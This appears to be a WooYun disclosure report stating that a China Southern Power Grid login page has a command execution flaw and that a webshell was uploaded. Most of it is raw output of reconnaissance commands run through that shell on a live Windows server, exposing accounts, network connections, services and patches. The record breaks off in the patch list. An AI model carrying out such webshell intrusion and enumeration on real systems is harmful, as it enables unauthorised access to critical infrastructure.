Getshell on a China Southern Power Grid system

ID: 152409
URL: http://www.wooyun.org/bug.php?action=view&id=152409
Status: the vendor was notified of the vulnerability but ignored it
Title: Getshell on a China Southern Power Grid system
Type: system/service patch not applied in time
Vendor: China Southern Power Grid
White hat: 朱元璋
Submitted: 2015-11-06 18:47:00
Disclosed: 2015-11-09 17:21:00
Fix time: (not set)
Confirmation time: 0000-00-00 00:00:00
Confirm Spend: -1
Tags: (none)
Followers: 0
Favourites: 0
White-hat rating: self-assessed rank 15
Vendor rating: rank 0
Summary: None

Vulnerability details

The address http://n.gy-center.net:8080/login.action has a command execution vulnerability.

A webshell was uploaded directly to the server.

POC

[*] 磁盘列表 [ C:D:E:F:G:P: ]
D:\Tomcat7\webapps\gycenter\gycenter\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_X3650 IWAM_X3650 SQLDebugger
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
系统找不到指定的路径。
D:\Tomcat7\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
F$ F:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\WINDOWS 远程管理
D$ D:\ 默认共享
E$ E:\ 默认共享
C$ C:\ 默认共享
命令成功完成。
D:\Tomcat7\> net view
列表是空的。
D:\Tomcat7\> net start
已经启动以下 Windows 服务:
Apache Tomcat 7.0 Tomcat7
Application Experience Lookup Service
Automatic Updates
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HID Input Service
HTTP SSL
IIS Admin Service
IPSEC Services
Logical Disk Manager
Microsoft Search
MSSQLSERVER
MySQL5
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Auto Connection Manager
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry
Secondary Logon
Security Accounts Manager
Serv-U FTP 服务器
Server
Shell Hardware Detection
SQLSERVERAGENT
Symantec pcAnywhere Host Service
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VisualSVN Server
Windows Audio
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service
命令成功完成。
D:\Tomcat7\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2704
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 468
TCP 0.0.0.0:1328 0.0.0.0:0 LISTENING 195828
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 195828
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1668
TCP 0.0.0.0:5631 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 53464
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 53464
TCP 61.145.119.248:80 14.215.53.61:18751 TIME_WAIT 0
TCP 61.145.119.248:80 14.215.53.61:28815 TIME_WAIT 0
TCP 61.145.119.248:80 14.215.53.61:31659 TIME_WAIT 0
TCP 61.145.119.248:80 61.142.246.10:52687 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:56848 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:58138 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:64213 ESTABLISHED 4
TCP 61.145.119.248:80 101.226.33.224:40631 TIME_WAIT 0
TCP 61.145.119.248:80 220.181.108.140:30043 TIME_WAIT 0
TCP 61.145.119.248:135 107.160.16.164:2887 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.16.170:4953 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.90.238:1329 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.90.238:4810 ESTABLISHED 712
TCP 61.145.119.248:1433 61.145.119.84:1030 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1031 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1032 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1052 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1055 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1056 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1057 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1060 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1062 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1063 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4612 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4817 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4823 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4843 ESTABLISHED 195828
TCP 61.145.119.248:1433 104.149.23.12:5060 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5114 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5512 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5527 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5741 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5903 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6249 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6706 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6872 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7190 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7380 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7628 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7809 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7891 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:8169 FIN_WAIT_1 195828
TCP 61.145.119.248:1433 104.149.23.12:8280 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:8342 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9028 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9785 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9962 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:10520 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:10860 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11041 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11335 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11527 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11769 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12554 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12597 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12644 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:13134 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:13671 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:14376 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:15098 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:16028 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:16726 FIN_WAIT_1 195828
TCP 61.145.119.248:1433 104.149.23.12:16956 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:17102 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:17185 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18505 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18594 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18769 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:19349 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:19823 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20325 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20651 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20990 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:21824 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:21866 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22082 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22272 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22564 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22663 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:23513 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24043 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24465 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24523 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24640 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24942 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26223 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26482 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26784 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26979 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:27885 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:28571 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29285 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29401 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29773 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30110 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30741 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30800 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:31254 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:31667 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32010 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32104 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32271 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32561 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32564 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32703 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33013 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33336 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33428 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33523 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33916 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33968 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34058 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34221 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34409 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34531 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34779 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35204 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35219 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35328 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35470 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35625 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35985 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36175 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36473 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36577 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37243 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37317 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37765 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37803 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:38306 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:38421 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39237 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39255 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39959 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40253 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40401 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40862 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40879 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40931 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:41572 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:41691 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43053 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43551 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43643 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43992 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44168 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44261 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44573 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44683 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44926 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45212 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45373 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45611 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46077 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46575 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46909 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47015 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47427 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47439 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47556 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47911 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48053 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48299 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48313 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48393 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48750 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48859 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49209 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49296 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49824 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49911 TIME_WAIT 0
TCP 61.145.119.248:2121 0.0.0.0:0 LISTENING 2244
TCP 61.145.119.248:4515 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4516 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4518 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4519 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4520 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4521 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4522 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4523 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4524 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4525 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4526 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4527 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4528 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4529 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4530 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4532 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4533 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4535 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4536 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4537 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4538 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4539 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4540 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4541 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4542 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4543 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4544 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4545 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4546 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4547 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4548 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4549 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4550 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4551 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4552 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4553 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4554 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4555 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4556 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4557 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4558 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4559 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4560 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4561 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4562 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4563 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4564 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4565 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4566 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4567 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4568 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4569 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4570 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4571 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4572 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4573 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4574 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4575 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4576 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4577 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4578 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4579 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4580 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4581 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:8080 171.111.42.252:37132 TIME_WAIT 0
TCP 61.145.119.248:8080 171.111.42.252:37351 ESTABLISHED 53464
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 53464
TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING 2244
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 468
UDP 0.0.0.0:1434 *:* 195828
UDP 0.0.0.0:4500 *:* 468
UDP 0.0.0.0:5632 *:* 1112
UDP 61.145.119.248:123 *:* 812
UDP 127.0.0.1:123 *:* 812
D:\Tomcat7\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 336 暂缺
csrss.exe 384 暂缺
winlogon.exe 408 暂缺
services.exe 456 Eventlog, PlugPlay
lsass.exe 468 HTTPFilter, NtLmSsp, PolicyAgent,
ProtectedStorage, SamSs
svchost.exe 648 DcomLaunch
svchost.exe 712 RpcSs
svchost.exe 776 Dhcp, Dnscache
svchost.exe 812 LmHosts, W32Time
svchost.exe 828 AeLookupSvc, AudioSrv, Browser, CryptSvc,
dmserver, EventSystem, helpsvc, HidServ,
lanmanserver, lanmanworkstation, Netman,
Nla, RasAuto, RasMan, Schedule, seclogon,
SENS, ShellHWDetection, TrkWks, winmgmt,
wuauserv, WZCSVC
spoolsv.exe 940 Spooler
msdtc.exe 980 MSDTC
awhost32.exe 1112 awhost32
svchost.exe 1164 ERSvc
inetinfo.exe 1468 IISADMIN
mysqld.exe 1668 MySQL5
svchost.exe 1940 RemoteRegistry
locator.exe 1960 RpcLocator
ServUDaemon.exe 2244 Serv-U
svchost.exe 2324 TapiSrv
svchost.exe 2336 TermService
VisualSVNServer.exe 2704 VisualSVNServer
dllhost.exe 3664 COMSysApp
mssearch.exe 3692 MSSEARCH
svchost.exe 3796 W3SVC
VisualSVNServer.exe 4484 暂缺
wmiprvse.exe 5808 暂缺
explorer.exe 7560 暂缺
Tomcat6w.exe 7652 暂缺
ctfmon.exe 7660 暂缺
Tomcat7w.exe 7688 暂缺
sqlmangr.exe 7700 暂缺
Tomcat7.exe 53464 Tomcat7
FlashFXP.exe 199788 暂缺
mmc.exe 205120 暂缺
sqlservr.exe 195828 MSSQLSERVER
sqlagent.exe 168480 SQLSERVERAGENT
logon.scr 176200 暂缺
w3wp.exe 211280 暂缺
davcdata.exe 208824 暂缺
w3wp.exe 208760 暂缺
cmd.exe 177320 暂缺
tasklist.exe 146092 暂缺
wmiprvse.exe 206900 暂缺
D:\Tomcat7\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : x3650
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接 2:
Media State . . . . . . . . . . . : Media disconnected
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #22
Physical Address. . . . . . . . . : 34-40-B5-9D-5C-3E
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #34
Physical Address. . . . . . . . . : 34-40-B5-9D-5C-3C
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.145.119.248
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.145.119.1
DNS Servers . . . . . . . . . . . : 202.96.128.86
202.96.128.110
NetBIOS over Tcpip. . . . . . . . : Disabled
D:\Tomcat7\> systeminfo
主机名: X3650
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: ibm
注册的组织:
产品 ID: 69813-650-6830353-45198
初始安装日期: 2012-7-13, 17:10:41
系统启动时间: 469 天 21 小时 10 分 20 秒
系统制造商: IBM
系统型号: System x3650 M3 -[7945O25]-
系统类型: X86-based PC
处理器: 安装了 16 个处理器。
[01]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[02]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[03]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[04]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[05]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[06]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[07]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[08]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[09]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[10]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[11]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[12]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[13]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[14]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[15]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[16]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
BIOS 版本: IBM - 0
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: 暂缺
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 16,372 MB
可用的物理内存: 13,268 MB
页面文件: 最大值: 18,157 MB
页面文件: 可用: 14,953 MB
页面文件: 使用中: 3,204 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 240 个修补程序。
[01]: File 1
[02]: File 1
[03]: File 1
[04]: File 1
[05]: File 1
[06]: File 1
[07]: File 1
[08]: File 1
[09]: File 1
[10]: File 1
[11]: File 1
[12]: File 1
[13]: File 1
[14]: File 1
[15]: File 1
[16]: File 1
[17]: File 1
[18]: File 1
[19]: File 1
[20]: File 1
[21]: File 1
[22]: File 1
[23]: File 1
[24]: File 1
[25]: File 1
[26]: File 1
[27]: File 1
[28]: File 1
[29]: File 1
[30]: File 1
[31]: File 1
[32]: File 1
[33]: File 1
[34]: File 1
[35]: File 1
[36]: File 1
[37]: File 1
[38]: File 1
[39]: File 1
[40]: File 1
[41]: File 1
[42]: File 1
[43]: File 1
[44]: File 1
[45]: File 1
[46]: File 1
[47]: File 1
[48]: File 1
[49]: File 1
[50]: File 1
[51]: File 1
[52]: File 1
[53]: File 1
[54]: File 1
[55]: File 1
[56]: File 1
[57]: File 1
[58]: File 1
[59]: File 1
[60]: File 1
[61]: File 1
[62]: File 1
[63]: File 1
[64]: File 1
[65]: File 1
[66]: File 1
[67]: File 1
[68]: File 1
[69]: File 1
[70]: File 1
[71]: File 1
[72]: File 1
[73]: File 1
[74]: File 1
[75]: File 1
[76]: File 1
[77]: File 1
[78]: File 1
[79]: File 1
[80]: File 1
[81]: File 1
[82]: File 1
[83]: File 1
[84]: File 1
[85]: File 1
[86]: File 1
[87]: File 1
[88]: File 1
[89]: File 1
[90]: File 1
[91]: File 1
[92]: File 1
[93]: File 1
[94]: File 1
[95]: File 1
[96]: File 1
[97]: File 1
[98]: File 1
[99]: File 1
[100]: File 1
[101]: File 1
[102]: File 1
[103]: File 1
[104]: File 1
[105]: File 1
[106]: File 1
[107]: File 1
[108]: File 1
[109]: File 1
[110]: File 1
[111]: File 1
[112]: File 1
[113]: File 1
[114]: File 1
[115]: File 1
[116]: File 1
[117]: File 1
[118]: Q147222
[119]: KB2742604 - QFE
[120]: KB2901115 - QFE
[121]: KB979907 - QFE
[122]: KB975558_WM8
[123]: KB925398_WMP64
[124]: KB2564958 - Update
[125]: KB2115168 - Update
[126]: KB2229593 - Update
[127]: KB2347290 - Update
[128]: KB2378111 - Update
[129]: KB2387149 - Update
[130]: KB2419635 - Update
[131]: KB2423089 - Update
[132]: KB2443105 - Update
[133]: KB2476490 - Update
[134]: KB2478960 - Update
[135]: KB2478971 - Update
[136]: KB2483185 - Update
[137]: KB2485663 - Update
[138]: KB2506212 - Update
[139]: KB2507938 - Update
[140]: KB2508429 - Update
[141]: KB2509553 - Update
[142]: KB2510587 - Update
[143]: KB2535512 - Update
[144]: KB2536276-v2 - Update
[145]: KB2544893-v2 - Update
[146]: KB2566454 - Update
[147]: KB2570947 - Update
[148]: KB2584146 - Update
[149]: KB2598479 - Update
[150]: KB2603381 - Update
[151]: KB2620712 - Update
[152]: KB2631813 - Update
[153]: KB2638806 - Update
[154]: KB2653956 - Update
[155]: KB2655992 - Update
[156]: KB2659262 - Update
[157]: KB2676562 - Update
[158]: KB2685939 - Update
[159]: KB2691442 - Update
[160]: KB2698365 - Update
[161]: KB2705219-v2 - Update
[162]: KB2712808 - Update
[163]: KB2727528 - Update
[164]: KB2742604 - Update
